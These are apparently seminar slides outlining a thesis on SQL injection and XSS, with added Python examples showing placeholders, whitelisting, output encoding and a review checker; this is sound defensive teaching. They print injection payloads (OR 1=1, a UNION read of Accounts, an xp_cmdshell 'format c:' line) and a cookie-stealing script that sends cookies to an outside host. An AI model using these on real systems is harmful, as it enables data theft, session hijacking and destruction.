Whatever it takes - Fixing SQLIA and XSS in the process
Diploma Thesis Outline Presentation, Florian Thiel
Seminar “Beiträge zum Software Engineering”, FU Berlin, 11/06/2008
OWASP Top 10 2007 (first five)
1. XSS
2. Injection Flaws
3. Malicious File Execution
4. Insecure Direct Object Reference
5. Cross-Site Request Forgery
© xkcd: http://xkcd.com/327/
"SELECT firstname FROM Students WHERE (login = '%s');" % login
SELECT firstname FROM Students WHERE (login = 'Robert'); DROP TABLE Students; -- ');
SQLIA threats
• data integrity
• confidentiality
• new attack vector
"UPDATE Users SET password = '%s' WHERE uid = '%s';" % (pw, uid)
Integrity
UPDATE Users SET password = 'password' WHERE uid = 'robert' OR 1=1; --';
"SELECT product FROM Products WHERE productid = '%s';" % pid
Confidentiality
SELECT product FROM Products WHERE productid = '0' UNION SELECT owner, balance FROM Accounts; --';
(a UNION has to select as many columns as the original query; the two-column SELECT above is shorthand)
"SELECT product, price FROM products WHERE category = '%s';" % category
New Attack Vector
SELECT product, price FROM products WHERE category = ''; EXEC master..xp_cmdshell 'format c:'; --';
(MS SQL Server: stacked statements plus xp_cmdshell turn the injection into OS command execution)
Bad Mitigations
• PHP: addslashes() (escapes for one quoting context only: useless for unquoted numeric contexts and defeated by multibyte charsets that swallow the backslash)
• IDS blacklisting
• validation blacklisting
Decent Mitigations
stmt = prepare("SELECT name FROM Users WHERE uid = $1")
db.execute(stmt, uid)
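The integrity and confidentiality slides above, run for real: the string-formatted queries from the slides against an in-memory SQLite database, next to the placeholder version from the "Decent Mitigations" slide. This is an added example, not code from the thesis; the schema and rows are constructed here (table names follow the slides), and the payloads end the statement with a comment instead of the slides' `;` because sqlite3's execute() refuses stacked statements (several production drivers do too; the xkcd DROP TABLE needs one that allows them).

```python
# Added example (not from the slides): string-formatted SQL vs. placeholders,
# exercised with payloads in the style of the slides against in-memory SQLite.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data for the Users, Products and Accounts tables."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE Users (uid TEXT PRIMARY KEY, password TEXT);
        CREATE TABLE Products (productid INTEGER PRIMARY KEY, product TEXT, price INTEGER);
        CREATE TABLE Accounts (owner TEXT, balance INTEGER);
        INSERT INTO Users VALUES ('robert', 'hunter2'), ('admin', 's3cret');
        INSERT INTO Products VALUES (1, 'Widget', 10), (2, 'Gadget', 25);
        INSERT INTO Accounts VALUES ('alice', 500), ('bob', 1200);
        """
    )
    return db


# --- vulnerable: the input is spliced into the SQL text (control plane) ---

def reset_password_unsafe(db, uid: str, pw: str) -> int:
    """Integrity slide. Returns how many rows the UPDATE touched."""
    query = "UPDATE Users SET password = '%s' WHERE uid = '%s';" % (pw, uid)
    return db.execute(query).rowcount


def product_unsafe(db, pid: str) -> set:
    """Confidentiality slide. Returns the (product, price) rows as a set."""
    query = "SELECT product, price FROM Products WHERE productid = '%s';" % pid
    return set(db.execute(query).fetchall())


# --- decent mitigation: placeholders keep the input in the data plane ---

def reset_password_safe(db, uid: str, pw: str) -> int:
    return db.execute(
        "UPDATE Users SET password = ? WHERE uid = ?;", (pw, uid)
    ).rowcount


def product_safe(db, pid: str) -> set:
    return set(db.execute(
        "SELECT product, price FROM Products WHERE productid = ?;", (pid,)
    ).fetchall())


def passwords(db) -> dict:
    """Current uid -> password mapping, to observe what an UPDATE did."""
    return dict(db.execute("SELECT uid, password FROM Users").fetchall())


# Payloads modelled on the slides; a trailing comment closes the statement
# because sqlite3.execute() rejects a second statement after ';'.
INTEGRITY_PAYLOAD = "robert' OR 1=1 --"
UNION_PAYLOAD = "0' UNION SELECT owner, balance FROM Accounts --"


if __name__ == "__main__":
    db = make_db()
    print("unsafe UPDATE touched", reset_password_unsafe(db, INTEGRITY_PAYLOAD, "pwned"), "rows")
    print("unsafe SELECT returned", product_unsafe(db, UNION_PAYLOAD))
    db = make_db()
    print("safe UPDATE touched", reset_password_safe(db, INTEGRITY_PAYLOAD, "pwned"), "rows")
    print("safe SELECT returned", product_safe(db, UNION_PAYLOAD))
```

With `?` the payload is bound as a value, so the UNION text never reaches the parser as syntax and the password reset matches no row. Placeholders bind values only: an attacker-chosen table or column name, or an ORDER BY expression, still has to be handled by whitelisting against known identifiers.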
Why it's hard
Control vs. Data: both are carried in the same string
More problems
• validation context != execution context
• really tolerant DBs
• "SEL"+"ECT", anyone?
• DBs trying to fix illegal SQL
Something different!?
http://searchsite/search?keyword="<script>alert('you have been XSSed!')</script>"
“This issue isn't just about scripting, and there isn't necessarily anything cross site about it. So why the name? It was coined earlier on when the problem was less understood, and it stuck. Believe me, we have had more important things to do than think of a better name. <g>”
-- Marc Slemko, Apache.org
eval('user input') [1][2]
[1] the essence of XSS
[2] limited only by the execution environment
XSS
• code injection
• popular in ECMAScript/Web2.0
Got cookies?
<script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script>
Got cookies? (the same payload, percent-encoded)
%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
The Worm
(Non-working) XSS Mitigations
• blacklisting of cribs
• blacklisting of characters
Helpful mitigations
• HttpOnly cookies (keep document.cookie away from injected script; they do not stop the injection itself)
• Whitelisting of characters
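The search page from the "Something different!?" slide, as an added example rather than code from the thesis: the keyword rendered by string formatting next to an output-encoded version, a crib blacklist that inspects the raw URL (the wrong context, which is why the percent-encoded cookie stealer above slips past it), and a character whitelist applied to the decoded value the page actually uses. The URL, payload and helper names are constructed for this example.

```python
# Added example (not from the slides): blacklist on the raw URL vs. whitelist
# and output encoding on the decoded value. Names and URLs are constructed.
import html
import re
from urllib.parse import parse_qs, quote, urlsplit

PAYLOAD = "<script>alert('you have been XSSed!')</script>"
PLAIN_URL = "http://searchsite/search?keyword=" + PAYLOAD
# Same payload percent-encoded, as on the "Got cookies?" slide.
ENCODED_URL = "http://searchsite/search?keyword=" + quote(PAYLOAD, safe="")

# Whitelist: letters, digits, underscore, space and hyphen, at most 64 chars.
KEYWORD_RE = re.compile(r"[\w \-]{1,64}")


def blacklist_passes(url: str) -> bool:
    """Crib blacklist applied to the raw, still percent-encoded URL."""
    raw = url.lower()
    return not any(crib in raw for crib in ("<script", "javascript:", "onerror="))


def keyword_from(url: str) -> str:
    """What the application actually sees: parse_qs percent-decodes the value."""
    return parse_qs(urlsplit(url).query).get("keyword", [""])[0]


def keyword_allowed(url: str) -> bool:
    """Character whitelist run on the decoded value, i.e. in the execution context."""
    return KEYWORD_RE.fullmatch(keyword_from(url)) is not None


def render_unsafe(url: str) -> str:
    """eval('user input'): the keyword is spliced into the HTML plane as-is."""
    return '<p>No results for "%s"</p>' % keyword_from(url)


def render_safe(url: str) -> str:
    """Encode for the HTML context at the point of output."""
    return '<p>No results for "%s"</p>' % html.escape(keyword_from(url), quote=True)


if __name__ == "__main__":
    for label, url in (("plain", PLAIN_URL), ("encoded", ENCODED_URL)):
        print(label, "blacklist passes:", blacklist_passes(url),
              "whitelist allows:", keyword_allowed(url))
    print(render_unsafe(ENCODED_URL))
    print(render_safe(ENCODED_URL))
```

The blacklist and the whitelist differ in two ways: the whitelist names what is allowed instead of guessing what is dangerous, and it runs after decoding, on the same bytes the template sees. Output encoding then covers whatever the whitelist lets through, and it has to match the context (HTML text here; an attribute, URL or script context each needs its own encoder).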
Common flaws
• HTML/XSS and SQL
• mix data and control
• have no well-defined execution environment
• have no “API”
Failure to sanitize data into a different plane
Safe Query Objects
• “real” SQL API
• adds static types
• dynamic queries still runtime evaluated
AntiSamy
• policy-based sanitization of HTML input
• “Types” (by RegEx)
• (no semantics)
Another job well done!
GET /en-us/library/aa287673(VS.71).aspx HTTP/1.1
Host: msdn.microsoft.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.google.de/search?q=http+request+header+example&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cache-Control: max-age=0
Hmm, are we missing something here?
Absolutely!
The interesting* part
* what my thesis is really about
Make sure that the technical solutions are thoroughly applied
1. Make developers use a reasonable architecture
2. Make developers recognize a weakness when they meet one
3. Make developers find weaknesses
4. Make people actually fix things
1) (Architecture)
• centralization
• canonicalization
• have to be conservative
2) (Recognition)
• patterns?
• flawed code examples in the wild
3) (Detection)
• automated flow analysis
• code inspection
Code inspection
• need a reading technique
• defect-based reading
Artifacts
• reviewer annotates suspicious code regions
• e.g. @userinput, @output
• makes review work visible in the source code
• and more valuable since annotations can be reused
// @userinput(data)
// [insert data into query, ignore non-alphanums]
def insertAlphaNum(query, data):
    // [make sure data is canonical]
    c_data = data.toCharSet(...)
    c_data.replace(...)
    ...
    // [insert data into query]
    query.prepare(...)
    query.insert(c_data...)
    ...
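One way the @userinput annotations can be reused once they are in the source, as an added example and not anything from the thesis: a checker that flags lines inside an annotated function where the annotated name is spliced into a string with `%`, `+`, `.format` or an f-string. It is a lexical pass, not a data-flow analysis (an input copied into another variable first is missed), it only scopes annotations to column-0 `def`s, and the source it scans is constructed here.

```python
# Added example (not from the thesis): reuse @userinput annotations to flag
# inputs spliced into strings. Lexical only; no real data-flow analysis.
import re

ANNOTATION = re.compile(r"#\s*@userinput\((\w+)\)")
DEF_LINE = re.compile(r"^def\s+\w+\s*\(")          # column-0 defs delimit scope


def splice_patterns(name: str):
    """Regexes for the usual ways a name ends up inside query or markup text."""
    n = re.escape(name)
    return (
        re.compile(r"%\s*" + n + r"\b"),                 # "..." % name
        re.compile(r"%\s*\([^)]*\b" + n + r"\b"),        # "..." % (a, name)
        re.compile(r"\+\s*" + n + r"\b"),                # "..." + name
        re.compile(r"\.format\([^)]*\b" + n + r"\b"),    # "...".format(name)
        re.compile(r"""f["'][^"']*\{""" + n + r"\b"),    # f"...{name}"
    )


def find_spliced_inputs(source: str):
    """Return (lineno, name) for every line that splices an annotated input."""
    findings = []
    pending = []   # names announced by annotations above the next def
    active = []    # names in scope for the current top-level function
    for lineno, line in enumerate(source.splitlines(), 1):
        m = ANNOTATION.search(line)
        if m:
            pending.append(m.group(1))
            continue
        if DEF_LINE.match(line):
            active, pending = pending, []
            continue
        if line.lstrip().startswith("#"):
            continue
        for name in active:
            if any(p.search(line) for p in splice_patterns(name)):
                findings.append((lineno, name))
    return findings


# Constructed sample: two functions that splice their input, one that binds it.
SAMPLE = '''\
# @userinput(login)
def first_name(db, login):
    query = "SELECT firstname FROM Students WHERE login = '%s'" % login
    return db.execute(query).fetchone()

# @userinput(uid)
# @userinput(pw)
def reset_password(db, uid, pw):
    query = "UPDATE Users SET password = '%s' WHERE uid = '%s'" % (pw, uid)
    db.execute(query)

# @userinput(uid)
def user_name(db, uid):
    return db.execute("SELECT name FROM Users WHERE uid = ?", (uid,)).fetchone()
'''

if __name__ == "__main__":
    for lineno, name in find_spliced_inputs(SAMPLE):
        print("line %d: @userinput(%s) spliced into a string" % (lineno, name))
```

The third function binds `uid` through a placeholder and is not reported, which is the behaviour the annotations are meant to make easy to check: the reviewer marks where input enters, and the splice sites fall out mechanically.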
4) (Repair)
• once weakness is known, developers should be motivated enough
• focus is on keeping the code secure, minimizing effort
My tasks
• provide practical architectural assumptions
• construct effective reading method
• + awareness of potential weaknesses
• get a project to adopt my methods
Questions?
This presentation is licensed under a Creative Commons BY-SA license.
Slides, materials, progress etc. can be found @ http://www.noroute.de/blog/diplomathesis
Attribution for pictures through links.
Thank you!